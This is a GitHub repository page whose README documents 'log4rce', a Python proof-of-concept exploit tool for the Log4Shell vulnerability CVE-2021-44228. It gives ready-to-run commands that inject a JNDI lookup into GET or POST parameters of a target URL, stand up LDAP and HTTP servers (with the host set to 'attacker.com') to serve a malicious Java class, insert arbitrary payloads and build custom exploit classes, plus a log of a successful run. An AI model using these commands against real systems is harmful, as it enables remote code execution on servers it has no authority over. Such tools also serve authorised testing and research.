Skip to content

alexandre-lavoie/python-log4rce

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
java
java
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
log4rce.py
log4rce.py
 
 

Repository files navigation

Python Log4RCE

An all-in-one pure Python3 PoC for CVE-2021-44228.

Sample

> python3 log4rce.py --target "linux" --payload "PAYLOAD" http -X POST --url "http://localhost:8080/" --data "address=###"
INFO:HTTP:Running on local port 1337
INFO:HTTP:Remote target is http://127.0.0.1:1337/LinuxExploit.class
INFO:LDAP:Running on local port 1387
INFO:Log4J:Sending payload to http://localhost:8080/
INFO:LDAP:Query from ('127.0.0.1', 42554)
INFO:HTTP:Request from ('127.0.0.1', 55328) to /LinuxExploit.class
INFO:Log4J:Done!

Usage

This is a CLI tool. All options can be found in the help menu:

python3 log4rce.py --help

The list is pretty extensive, therefore the following will give you a summary of the functionality.

Attack Modes

The tool allows you to use a few attack modes. These attacks are extensions of the Log4RCE class.

HTTP

You can perform an automated HTTP request attack on a target URL.

You can perform a GET request as follows:

python3 log4rce.py http --url "http://www.vuln.com:1234/?vuln_param=###&param=123" --headers="P1=123&P2=123"

You can perform a POST request as follows:

python3 log4rce.py http -X POST --url "http://www.vuln.com:1234/" --data "vuln_param=###&param=123" --headers="P1=123&P2=123"

The previous will inject the JNDI tag into ###.

Manual

If you cannot use any of the previous, use this mode to dump the JDNI tag:

python3 log4rce.py manual

Network Settings

The tool allows extensive customization for most network configuration. All the internal servers can be modified to point to different locations according the the remote settings.

HTTP Server

You can configure the HTTP server using the following parameters:

python3 log4rce.py --http_port 1234 --http_rport 12345 --http_host "attacker.com"
http_port: The local port to run the server on.
http_rport: The port that a remote machine accesses.
http_host: The host name/IP a remote machine accesses.

LDAP Server

You can configure the LDAP server using the following parameters:

python3 log4rce.py --ldap_port 1234 --ldap_rport 12345 --ldap_host "attacker.com"
ldap_port: The local port to run the server on.
ldap_rport: The port that a remote machine accesses.
ldap_host: The host name/IP a remote machine accesses.

Customization

The tool allows can handle some customization. The following lists some functionality you may be interested in.

Injecting Payload

You can inject a payload into the Java class using:

python3 log4rce.py --payload "PAYLOAD"

The payload will be injected into "###" strings.

Custom Java Payload

You can build your own Java class using the following.

javac -source 1.7 -target 1.7 /path/to/Exploit.java

The resulting .class can be run using:

python3 log4rce.py --java_class "/path/to/Exploit.class" ...

Note: You can add a string "###" to allow payload injection.

About

An All-In-One Pure Python PoC for CVE-2021-44228

Topics

python cli log4j rce cve-2021-44228

Resources

Readme

License

MIT license
Activity

Stars

175 stars

Watchers

10 watching

Forks

30 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages